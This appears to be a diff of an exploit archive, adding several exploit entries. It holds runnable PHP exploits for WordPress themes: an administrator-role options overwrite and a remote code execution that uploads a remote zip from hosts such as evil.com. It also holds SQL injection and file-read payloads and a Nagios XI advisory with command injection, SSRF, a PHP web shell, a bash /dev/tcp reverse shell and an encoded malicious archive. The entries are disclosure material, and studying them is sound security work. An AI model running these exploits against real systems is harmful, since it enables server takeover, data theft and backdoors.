* Software Link: http://themeforest.net/item/newspaper/5489609
* Version: 6.7.1
* Tested on: Debian 8, PHP 5.6.17-3
* Type: WP Options Overwrite, Possible more
* Time line: Found [23-APR-2016], Vendor notified [23-APR-2016], Vendor fixed: [27-APR-2016], [RD:1]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:u:p:f:c:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function exploit(){
global $curl, $options;
switch ($options['m']){
case "admin_on":
echo "Setting default role to Administrator \n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[default_role]'=>'administrator');
break;
case "admin_off":
echo "Setting default role to Subscriber \n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[default_role]'=>'subscriber');
break;
case "reg_on":
echo "Enabling registrations\n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[users_can_register]'=>'1');
break;
case "reg_on":
echo "Disabling registrations\n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[users_can_register]'=>'0');
break;
}
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Response: ". $resp."\n";
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('admin_on','reg_on','admin_off','reg_off') ) ){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Newspaper WP Theme Exploit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE]
[TARGET_URL] http://localhost/wordpress/
[MODE] admin_on - Default admin level on reg. admin_off - Default subscriber on reg.
reg_on - Turns on user registration. reg_off - Turns off user registrations.
Trun on registrations, set default level to admin, register a user on the webiste,
turn off admin mode, turn off user registrations.
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -m admin_on
[Register a new user as Admin]
php $argv[0] -t http://localhost/wordpress --tor=yes -m admin_off
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}

152
platforms/php/webapps/39895.php Executable file
View file

@ -0,0 +1,152 @@
<?php
/**
* Exploit Title: Uncode WP Theme RCE Expoit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage:
* Software Link: http://themeforest.net/item/uncode-creative-multiuse-wordpress-theme/13373220
* Version: 1.3.0 possible 1.3.1
* Tested on: Debian 8, PHP 5.6.17-3
* Type: RCE, Arbirary file UPLOAD, (Low Authenticated )
* Time line: Found [24-APR-2016], Vendor notified [24-APR-2016], Vendor fixed: [27-APR-2016], [RD:1464134400]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:u:p:f:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
echo "Generateing payload.\n";
$data = array('action'=>'uncodefont_download_font', 'font_url'=>$options['f']);
echo "Sending payload\n";
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Eco response: ".$resp."\n";
$resp = json_decode($resp,true);
if ($resp['success'] === 'Font downloaded and extracted successfully.'){
echo "Response ok, calling RCE\n";
$file_path = parse_url($options['f']);
$remote_file_info = pathinfo($file_path['path']);
$zip_file_name = $remote_file_info['basename'];
$zip_file_name_php = str_replace('.zip', '.php', $zip_file_name);
$url = $options['t'].'wp-content/uploads/uncode-fonts/'.$zip_file_name.'/'.$zip_file_name_php;
echo 'Url: '. $url."\n";
//POC Test mode
if ($file_path['host'] == 'wp0day.com'){
echo "Exploit test mode on\n";
$rnd = rand();
echo "Rand $rnd, MD5: ".md5($rnd)."\n";
$url = $url . '?poc='.$rnd;
}
$curl->get($url);
echo "RCE Response:";
echo $curl->getResponse()."\n\n";
}
}
logIn();
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if ( !isset($options['u']) ){
return false;
}
if ( !isset($options['p']) ){
return false;
}
if ( !isset($options['f']) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Uncode WP Theme RCE Expoit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -f [URL]
*** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
[TARGET_URL] http://localhost/wordpress/
[URL] It must be ZIP file. It gets unzipped into /wp-content/uploads/uncode-fonts/[some.zip]/files folder
Example: rce.php -> zip -> rce.zip -> http://evil.com/rce.zip -> /wp-content/uploads/uncode-fonts/rce.zip/rce.php
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -f http://wp0day.com/res/php/poc.zip
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}

29
platforms/php/webapps/39896.txt Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: Double Opt-In for Download 2.0.9 Sql Injection
# Date: 06-06-2016
# Software Link: https://wordpress.org/plugins/double-opt-in-for-download/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
`$_POST['id']` is not escaped.
`populate_download_edit_form()` is accessible for every registered user.
http://security.szurek.pl/double-opt-in-for-download-209-sql-injection.html
2. Proof of Concept
Login as regular user.
<form name="xss" action="http://wordpress-url/wp-admin/admin-ajax.php?action=populate_download_edit_form" method="post">
<input type="text" name="id" value="0 UNION SELECT 1, 2, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID=1">
<input type="submit" value="Send">
</form>
3. Solution:
Update to version 2.1.0

39
platforms/php/webapps/39898.txt Executable file
View file

@ -0,0 +1,39 @@
Title
===================
rConfig, the open source network device configuration management tool, Vulnerable to Local File Inclusion
Summary
===================
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server.
Affected Products
===================
rConfig 3.1.1 and earlier
CVE
===================
N/A
Details
===================
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server. This is because downloadFile.php does not check the download_file parameter before it uses it. It merely opens and sends the file in the parameter to the user. As long as the account running the web server has access to it, rConfig will open it and send it.
Verification of Vulnerability
===================
The following steps can be carried out in duplicating this vulnerability.
Step 1:
Enter the following into your browser address bar:
http://<SERVER>/lib/crud/downloadFile.php?download_file=/etc/passwd
Step 2:
Confirm that the passwd file is valid
Impact
===================
Information Disclosure. User privileges and unauthorized access to the system.
Credits
===================
Gregory Pickett (@shogun7273), Hellfire Security

268
platforms/php/webapps/39899.txt Executable file
View file

@ -0,0 +1,268 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Nagios XI Multiple Vulnerabilities
Affected versions: Nagios XI <= 5.2.7
PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf
+-----------+
|Description|
+-----------+
The Nagios XI application is affected by multiple security
vulnerabilities, including unauthenticated SQL injection and
authentication bypass, arbitrary code execution via command injection,
privilege escalation, server-side request forgery and account hijacking.
These vulnerabilities can be chained together to obtain unauthenticated
remote code execution as the root user.
+------------+
|Exploitation|
+------------+
==SQL Injection==
The host and service GET parameters in the nagiosim.php page are
vulnerable to SQL injection via error-based payloads. An attacker can
exploit this vulnerability to retrieve sensitive information from the
applications MySQL database such as the administrative users password
hash (unsalted MD5) or the token used to authenticate to the Nagios XI
REST API. This security issue is aggravated by the fact that an attacker
can directly browse to the vulnerable page and exploit the vulnerability
without providing a valid session cookie.
[POC - DUMP ADMIN API TOKEN]
GET
/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service='+AND+
(SELECT+1+FROM(SELECT+COUNT(*),CONCAT('|APIKEY|',(SELECT+MID((IFNULL(CAST(backend_ticket+AS
+CHAR),0x20)),1,54)+FROM+xi_users+WHERE+user_id%3d1+LIMIT+0,1),'|APIKEY|',FLOOR(RAND(0)*2))
x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+OR+' HTTP/1.1
The API token can be reused to bypass authentication either by creating
a user via the REST API or through the Rapid Response functionality as
shown below.
[POC- BYPASS AUTHENTICATION THROUGH RAPID RESPONSE FUNCTIONALITY]
// uid == <user_id>-<object_id>-<MD5(api token)>, object id value
doesn't matter
GET /nagiosxi/rr.php?uid=1-b-<hash> HTTP/1.1
==Command Injection==
Multiple command injection vulnerabilities exist in the Nagios XI web
interface due to unescaped user input being passed to shell functions as
an argument. This issues can be exploited to inject arbitrary shell
commands and obtain remote code execution in the context of the 'apache'
user.
URL => GET
/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=<api
token>&incident_id=<valid incident id>&title=<PAYLOAD>&status=<any value>
PARAMETER => title
POC PAYLOAD => title'; touch /tmp/FILE; echo '
URL => GET
/nagiosxi/includes/components/perfdata/graphApi.php?host=<any monitored
host IP>&start=<PAYLOAD>&end=<PAYLOAD>
PARAMETERS => start, end
POC PAYLOAD => 1; touch /tmp/FILE;
==Privilege Escalation==
The Nagios XI default sudoers configuration can be abused to elevate
privileges to root due to an insecure implementation of the
applications component upload functionality. The apache user can run
the getprofile.sh script with root privileges without being prompted for
a password. The getprofile.sh script is part of the Profile component
along with the following files:
- profile.php, the PHP script that outputs the system information.
- profile.inc.php, a PHP include file with required functionality for
profile.php.
An attacker can backdoor the profile.php file with a function to execute
arbitrary shell commands (e.g. <?php system($_GET['cmd']); ?> ), replace
the getprofile.sh file with a malicious payload (e.g. “#!/bin/bash bash
i >& /dev/tcp/<IP>/<PORT> 0>&1”) and finally create a profile.zip
archive containing the malicious component files. Once uploaded, the
application will unzip the component archive and overwrite the existing
profile directory and its files, including getprofile.sh.
[POC - MALICIOUS 'profile.zip' COMPONENT ARCHIVE]
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
vREAAAAA
[POC - PRIVILEGE ESCALATION EXPLOITATION]
GET /nagiosxi/includes/components/profile/profile.php?cmd=sudo
./getprofile.sh
The default Profile component archive can be downloaded at the following
link:
https://assets.nagios.com/downloads/nagiosxi/components/profile.zip
==Server-Side Request Forgery==
Multiple server-side request forgery vulnerabilities exist in the Nagios
XI application. An attacker can provide arbitrary data to curl_exec
calls to port scan internal services listening on localhost, read files
on the Nagios XI server file system or send data to other hosts in the
same internal network where the Nagios XI server is deployed.
// the application filter the string 'file://' can be bypassed by
converting the handler to uppercase
URL => GET /nagiosxi/ajaxproxy.php?proxyurl=<PAYLOAD>
PARAMETER => proxyurl
POC PAYLOAD => FILE:///<path>/<file>
URL => GET /nagiosxi/backend/?cmd=geturlhtml&url=<PAYLOAD>
PARAMETER => url
POC PAYLOAD => file:///<path>/<file>
==Account Hijacking==
The Nagios XI application is vulnerable to an arbitrary account
hijacking vulnerability due to an insecure implementation of the
password reset functionality. The application does not enforce any
verification to confirm the provided reset token can only be used to
change the login credentials for the specific user for which it was
generated. A limited user can therefore abuse the password reset
functionality to hijack an administrative account by tampering with the
username hidden parameter during the password reset process.
[POC - ACCOUNT HIJACKING 'nagiosadmin']
POST /nagiosxi/login.php?finishresetpass&username=stduser&token-<reset
token> HTTP/1.1
token=<reset
token>&username=nagiosadmin&password1=<PASSWORD>&password2=<PASSWORD>&reset=1
+----------+
| Solution |
+----------+
Upgrade to Nagios XI 5.2.8.
Please note at the time of this writing the privilege escalation
vulnerability is still unpatched. The SSRF vulnerabilities have been
only partially fixed by blacklisting the 'file://' handler, but all the
other SSRF attack vectors are still exploitable. Vendor stated these
vulnerabilities will be likely patched on the next release of the
application as they require authentication and as such are not
considered major security issues.
+------------+
| Timeline |
+------------+
13/05/2016 Initial disclosure to vendor
14/05/2016 Vendor confirms receipt of advisory
25/05/2016 Vendor provides fixes for most of the vulnerabilities
25/05/2016 Enquiry about the status of fixes for the unpatched
vulnerabilities
26/05/2016 Vendor responded with “Since the major issues have been
fixed and the remaining issues I'd like to touch up are only available
if the user is logged in, or logged in as admin, I don't see a reason to
hold onto releasing the advisory.”
2/06/2016 Public disclosure
+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf

52
platforms/windows/local/39888.txt Executable file
View file

@ -0,0 +1,52 @@
# Exploit Title: Valve Steam 3.42.16.13 Local Privilege Escalation
# CVE-ID: CVE-2016-5237
# Date: 5/11/52016
# Exploit Author: gsX
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://www.valvesoftware.com/
# Software Link: http://store.steampowered.com/about/
#Version: File Version 3.42.16.13, Built: Apr 29 2016, Steam API: v017, Steam package versions: 1461972496
# Tested on: Windows 7 Professional x64 fully updated.
1. Description:
The Steam directory located at C:\Program Files (x86)\Steam implement weak
file permissions
and allow anyone in the BUILTIN\Users windows group to modify any file in
the Steam directory and any of its child files and folders.
Since Steam is a startup application by default this makes it particularly
easy to achieve lateral/vertical privilege escalation and achieve code
execution against any user running the application.
2. Proof
C:\Program Files (x86)>icacls Steam
Steam BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
3. Exploit:
Simply backdoor/replace Steam.exe or any other related exe's/dll's with
the code you want to
run.
I would like to note that I contacted Valve on several occasions
and gave them plenty of time to reply/fix the issue before releasing this
entry.